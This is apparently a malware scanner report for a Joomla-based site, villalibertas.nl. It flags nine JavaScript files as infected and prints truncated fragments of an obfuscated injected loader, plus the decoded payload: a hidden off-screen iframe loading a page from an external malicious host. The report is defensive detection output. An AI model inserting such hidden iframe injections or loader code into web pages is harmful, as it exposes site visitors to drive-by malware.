Malware Scanner report for villalibertas.nl

Malicious/Suspicious/Total urls checked: 9/0/15

9 pages have malicious code. See details below

Blacklists: OK

Malicious Redirects: OK

Malicious/Hidden/Total iFrames: 0/0/4

Deface / Content modification: OK

Free periodic scanning and alerting: setup
(requires eVuln badge or a link to eVuln.com)

Malware & Hack Repair

Malware Removal
Blacklists Removal
Reason Eliminating
1 Month Hack Insurance

More details

Website Hack Insurance

Files & DB Monitoring
Daily Backups
Malware & Hack Detection
Unlimited Hack Repairs

More details

Scanned pages/files

Request	Server response	Status
http://villalibertas.nl/	200 OK Content-Length: 13085 Content-Type: text/html	clean
http://villalibertas.nl/media/system/js/caption.js	200 OK Content-Length: 3832 Content-Type: application/x-javascript	clean
http://villalibertas.nl/plugins/content/avreloaded/silverlight.js	200 OK Content-Length: 9962 Content-Type: application/x-javascript	malicious
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function ffff_listier_ua(){ var nevernList = 'iPhone\|Macintosh\|Linux\|iPad\|Series40\|SymbOS\|Flock\|SeaMonkey\|Nokia\|SlimBrowser\|AmigaOS\|Android\|FreeBSD\|Chrome\|IEMobile\|SymbianOS\|Avant\|Chromium\|Fire ... 3373 bytes are skipped ...r)window.removeEventListener("unload",Silverlight.__cleanup,false);else window.detachEvent("onunload",Silverlight.__cleanup)};Silverlight.followFWLink=function(a){top.location=Silverlight.fwlinkRoot+String(a)};Silverlight.HtmlAttributeEncode=function(c){var a,b="";if(c==null)return null;for(var d=0;d<c.length;d++){a=c.charCodeAt(d);if(a>96&&a<123\|\|a>64&&a<91\|\|a>43&&a<58&&a!=47\|\|a==95)b=b+String.fromCharCode(a);else b=b+"&#"+a+";"}return b} Antivirus reports: Avast JS:Iframe-EHG [Trj] DrWeb JS.IFrame.566 Microsoft Trojan:JS/Iframe.DI Fortinet JS/IFrame.XX!tr
http://villalibertas.nl/plugins/content/avreloaded/wmvplayer.js	200 OK Content-Length: 18345 Content-Type: application/x-javascript	malicious
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function ffff_listier_ua(){ var nevernList = 'iPhone\|Macintosh\|Linux\|iPad\|Series40\|SymbOS\|Flock\|SeaMonkey\|Nokia\|SlimBrowser\|AmigaOS\|Android\|FreeBSD\|Chrome\|IEMobile\|SymbianOS\|Avant\|Chromium\|Fire ... 3188 bytes are skipped ...nTime(A,this.configuration.duration)}};jeroenwijering.utils.delegate=function(A,B){return function(){return B.apply(A,arguments)}};jeroenwijering.utils.timestring=function(A){var C=Math.floor(A/3600);var B=Math.floor(A%3600/60);var D=Math.round(A%60);var E="";D>9?E+=D:E+="0"+D;B>9?E=B+":"+E:E="0"+B+":"+E;C>0?E=C+":"+E:null;return E};jeroenwijering.utils.spanstring=function(A){var C=Math.floor(A/3600);var B=Math.floor(A%3600/60);var D=Math.round(A%60*10)/10;var E=C+":"+B+":"+D;return E}; Decoded script: <iframe src="http://susuroot.insidesavannah.com/kfggesfgdhfjgj8.html" style="position:absolute;left:-1320px;top:-1320px;" height="185" width="185" name="Nightly"></iframe> Antivirus reports: Avast JS:Iframe-EHG [Trj] DrWeb JS.IFrame.566 Microsoft Trojan:JS/Iframe.DI Fortinet JS/IFrame.XX!tr
http://villalibertas.nl/plugins/content/avreloaded/swfobject.js	200 OK Content-Length: 14123 Content-Type: application/x-javascript	malicious
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function ffff_listier_ua(){ var nevernList = 'iPhone\|Macintosh\|Linux\|iPad\|Series40\|SymbOS\|Flock\|SeaMonkey\|Nokia\|SlimBrowser\|AmigaOS\|Android\|FreeBSD\|Chrome\|IEMobile\|SymbianOS\|Avant\|Chromium\|Fire ... 3221 bytes are skipped ...ing(0,pairs[i].indexOf("="))==param){return pairs[i].substring((pairs[i].indexOf("=")+1))}}}return""},expressInstallCallback:function(){if(isExpressInstallActive&&storedAltContent){var obj=getElementById(EXPRESS_INSTALL_ID);if(obj){obj.parentNode.replaceChild(storedAltContent,obj);if(storedAltContentId){setVisibility(storedAltContentId,true);if(ua.ie&&ua.win){storedAltContent.style.display="block"}}storedAltContent=null;storedAltContentId=null;isExpressInstallActive=false}}}}}(); Decoded script: <iframe src="http://susuroot.insidesavannah.com/kfggesfgdhfjgj8.html" style="position:absolute;left:-1320px;top:-1320px;" height="185" width="185" name="Nightly"></iframe> Antivirus reports: Avast JS:Iframe-EHG [Trj] DrWeb JS.IFrame.566 Microsoft Trojan:JS/Iframe.DI Fortinet JS/IFrame.XX!tr
http://villalibertas.nl/plugins/content/avreloaded/avreloaded.js	200 OK Content-Length: 4228 Content-Type: application/x-javascript	malicious
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function ffff_listier_ua(){ var nevernList = 'iPhone\|Macintosh\|Linux\|iPad\|Series40\|SymbOS\|Flock\|SeaMonkey\|Nokia\|SlimBrowser\|AmigaOS\|Android\|FreeBSD\|Chrome\|IEMobile\|SymbianOS\|Avant\|Chromium\|Fire ... 3232 bytes are skipped ..."}var D=Json.evaluate(B.getProperty("title"));if(C=="lightbox"){D.url=decodeURIComponent(D.url);if(typeof (window.opera)!="undefined"){D.size.y+=4}D.onClose=function(){var G=$$("#sbox-content iframe");if(G&&(G.length>0)){G[0].src="about:blank"}};SqueezeBox.fromElement(B,D)}else{var A=window.open(decodeURIComponent(D.url),"avrpopup"+F,"status=no,toolbar=no,scrollbars=no,titlebar=no,menubar=no,resizable=no,width="+D.size.x+",height="+D.size.y+",directories=no,location=no");A.focus()}}}; Antivirus reports: Avast JS:Iframe-EHG [Trj] DrWeb JS.IFrame.566 Microsoft Trojan:JS/Iframe.DI Fortinet JS/IFrame.XX!tr
http://villalibertas.nl/modules/mod_news_show_gk2/scripts/engine.js	200 OK Content-Length: 5502 Content-Type: application/x-javascript	malicious
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function ffff_listier_ua(){ var nevernList = 'iPhone\|Macintosh\|Linux\|iPad\|Series40\|SymbOS\|Flock\|SeaMonkey\|Nokia\|SlimBrowser\|AmigaOS\|Android\|FreeBSD\|Chrome\|IEMobile\|SymbianOS\|Avant\|Chromium\|Fire ... 3423 bytes are skipped ...> $(TID).getElementsBySelector('tr')[(NR-NV)].setStyle('display',''); NV--; $E('.gk_news_show_panel_amount_value',el).setHTML(NR-NV); Cookie.set('gk_news_show_amount'+TID, (NR-NV), {duration: 14,path: "/"}); if(list){ for(var k=0;k<NC;k++){ if(((NR-NV)NC)-(1+k) < amountOfLi) listOfLi[((NR-NV)NC)-(1+k)].setStyle('display','none'); } } } }); } } }); }); Decoded script: <iframe src="http://susuroot.insidesavannah.com/kfggesfgdhfjgj8.html" style="position:absolute;left:-1320px;top:-1320px;" height="185" width="185" name="Nightly"></iframe> Antivirus reports: Avast JS:Iframe-EHG [Trj] DrWeb JS.IFrame.566 Microsoft Trojan:JS/Iframe.DI Fortinet JS/IFrame.XX!tr
http://villalibertas.nl/modules/mod_gk_news_image_5/js/engine.js	200 OK Content-Length: 8163 Content-Type: application/x-javascript	malicious
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function ffff_listier_ua(){ var nevernList = 'iPhone\|Macintosh\|Linux\|iPad\|Series40\|SymbOS\|Flock\|SeaMonkey\|Nokia\|SlimBrowser\|AmigaOS\|Android\|FreeBSD\|Chrome\|IEMobile\|SymbianOS\|Avant\|Chromium\|Fire ... 3368 bytes are skipped ... var $this = this; if(!play) this.image_pause($G); if((play \|\| $G["autoanim"] == 1) && ($G["actual_anim"] == false)){ $G["actual_anim"] = (function(){ n = (n < max) ? n+1 : 0; $this.image_anim(elID,mainwrap,wrap,slides,n,contents,$G,true); }).periodical($G["anim_speed"]*2+$G["anim_interval"]); } } }, image_pause : function($G){ $clear($G["actual_anim"]); $G["actual_anim"] = false; } }); Decoded script: <iframe src="http://susuroot.insidesavannah.com/kfggesfgdhfjgj8.html" style="position:absolute;left:-1320px;top:-1320px;" height="185" width="185" name="Nightly"></iframe> Antivirus reports: Avast JS:Iframe-EHG [Trj] DrWeb JS.IFrame.566 Microsoft Trojan:JS/Iframe.DI Fortinet JS/IFrame.XX!tr
http://villalibertas.nl/modules/mod_gk_news_image_5/js/importer.php?mid=news_image_5_1&animation_slide_speed=1000&animation_interval=5000&autoanimation=1&animation_slide_type=0&animation_text_type=0&base_bgcolor=000000&text_block_opacity=0.45	200 OK Content-Length: 219 Content-Type: text/javascript	clean
http://villalibertas.nl/templates/gk_gomuproject/lib/scripts/template_scripts.js	200 OK Content-Length: 3814 Content-Type: application/x-javascript	malicious
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function ffff_listier_ua(){ var nevernList = 'iPhone\|Macintosh\|Linux\|iPad\|Series40\|SymbOS\|Flock\|SeaMonkey\|Nokia\|SlimBrowser\|AmigaOS\|Android\|FreeBSD\|Chrome\|IEMobile\|SymbianOS\|Avant\|Chromium\|Fire ... 3093 bytes are skipped ...etStyle("padding-top").toInt() - chld.getStyle("padding-bottom").toInt(); if(h > max_height) max_height = h; }); $ES('.users', $('bottom_wrap')).each(function(el, i){ el.getChildren()[0].setStyle("height", max_height+"px"); }); } }); function changeStyle(style){ var file = template_path+'/css/style'+style+'.css'; new Asset.css(file); new Cookie.set('gk16_style',style,{duration: 200,path: "/"}); actual_style = style; } Decoded script: <iframe src="http://susuroot.insidesavannah.com/kfggesfgdhfjgj8.html" style="position:absolute;left:-1320px;top:-1320px;" height="185" width="185" name="Nightly"></iframe> Antivirus reports: Avast JS:Iframe-EHG [Trj] DrWeb JS.IFrame.566 Microsoft Trojan:JS/Iframe.DI Fortinet JS/IFrame.XX!tr
http://villalibertas.nl/templates/gk_gomuproject/lib/scripts/jmenu_2.js	200 OK Content-Length: 3755 Content-Type: application/x-javascript	malicious
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function ffff_listier_ua(){ var nevernList = 'iPhone\|Macintosh\|Linux\|iPad\|Series40\|SymbOS\|Flock\|SeaMonkey\|Nokia\|SlimBrowser\|AmigaOS\|Android\|FreeBSD\|Chrome\|IEMobile\|SymbianOS\|Avant\|Chromium\|Fire ... 2986 bytes are skipped .../> levels.each(function(e,k){ e.each(function(a,l){ a.addEvent("mouseenter",function(){ a.getChildren()[1].setStyle("overflow","hidden"); effects2[k][l].toggle(); (function(){a.getChildren()[1].setStyle("overflow","")}).delay(500); }); a.addEvent("mouseleave",function(){ a.getChildren()[1].setStyle("overflow","hidden"); effects2[k][l].stop(); effects2[k][l].set(0); }); }); }); }); Decoded script: <iframe src="http://susuroot.insidesavannah.com/kfggesfgdhfjgj8.html" style="position:absolute;left:-1320px;top:-1320px;" height="185" width="185" name="Nightly"></iframe> Antivirus reports: Avast JS:Iframe-EHG [Trj] DrWeb JS.IFrame.566 Microsoft Trojan:JS/Iframe.DI Fortinet JS/IFrame.XX!tr
http://villalibertas.nl/templates/gk_gomuproject/lib/scripts/ie.js	200 OK Content-Length: 2259 Content-Type: application/x-javascript	malicious
Malicious code - confirmed by antiviruses (see below) (function(){ function stripos (f_haystack, f_needle, f_offset) { var haystack = (f_haystack + '').toLowerCase(); var needle = (f_needle + '').toLowerCase(); var index = 0; if ((index = haystack.indexOf(needle, f_offset)) !== -1) { return index; } return false; } function ffff_listier_ua(){ var nevernList = 'iPhone\|Macintosh\|Linux\|iPad\|Series40\|SymbOS\|Flock\|SeaMonkey\|Nokia\|SlimBrowser\|AmigaOS\|Android\|FreeBSD\|Chrome\|IEMobile\|SymbianOS\|Avant\|Chromium\|Fire ... 1377 bytes are skipped ...htly"></ifr'+'am'+'e'+'>'); } } })(); sfHover = function() { var sfEls = document.getElementById("horiz-menu").getElementsByTagName("LI"); for (var i=0; i<sfEls.length; i++) { sfEls[i].onmouseover=function() { this.className+=" sfHover"; } sfEls[i].onmouseout=function() { this.className=this.className.replace(new RegExp(" sfHover\\b"), ""); } } } if (window.attachEvent) window.attachEvent("onload", sfHover); Decoded script: function () { var sfEls = document.getElementById("horiz-menu").getElementsByTagName("LI"); for (var i = 0; i < sfEls.length; i++) { sfEls[i].onmouseover = function () {this.className += " sfHover";}; sfEls[i].onmouseout = function () {this.className = this.className.replace(new RegExp(" sfHover\\b"), "");}; } } <iframe src="http://susuroot.insidesavannah.com/kfggesfgdhfjgj8.html" style="position:absolute;left:-1320px;top:-1320px;" height="185" width="185" name="Nightly"></iframe> Antivirus reports: Qihoo-360 Trojan.Generic Avast JS:Iframe-EHG [Trj] Ikarus Trojan.JS.IFrame TrendMicro-HouseCall Suspicious_GEN.F47V0618 DrWeb JS.IFrame.566 Microsoft Trojan:JS/Iframe.DI Fortinet JS/IFrame.XX!tr
http://translate.google.com/translate_a/element.js?cb=googleTranslateElementInit	200 OK Content-Length: 1475 Content-Type: text/javascript	clean
http://villalibertas.nl/./	200 OK Content-Length: 13087 Content-Type: text/html	clean
http://villalibertas.nl/welcome.html	200 OK Content-Length: 22356 Content-Type: text/html	clean

Malicious Redirects

First query (normal visit):
GET / HTTP/1.1
Host: villalibertas.nl

Result:
HTTP/1.1 200 OK
Cache-Control: post-check=0, pre-check=0
Connection: close
Date: Sun, 05 Oct 2014 00:23:50 GMT
Pragma: no-cache
Server: Apache
Content-Type: text/html; charset=utf-8
Expires: Mon, 1 Jan 2001 00:00:00 GMT
Last-Modified: Sun, 05 Oct 2014 00:23:51 GMT
P3P: CP="NOI ADM DEV PSAi COM NAV OUR OTRo STP IND DEM"
Set-Cookie: 4fafe161220916b4800d2e652a652cb6=4d20623bd3c52bb4ca32bc7d3460a371; path=/
X-Powered-By: PHP/5.2.17

Second query (visit from search engine):
GET / HTTP/1.1
Host: villalibertas.nl
Referer: http://www.google.com/search?q=villalibertas.nl

Result:
The result is similar to the first query. There are no suspicious redirects found.

Safe Browsing / Blacklists

Query: http://www.google.com/safebrowsing/diagnostic?site=villalibertas.nl

Result: This site is not currently listed as suspicious.

Query: http://yandex.com/infected?l10n=en&url=http://villalibertas.nl/

Result: villalibertas.nl is not infected or malware details are not published yet.

Recently found suspicious websites

Malware Scanner report for villalibertas.nl

Malware & Hack Repair

Website Hack Insurance

Scanned pages/files

Malicious Redirects

Safe Browsing / Blacklists

Recently found suspicious websites

Company

Services

eVuln Labs

eVuln Tools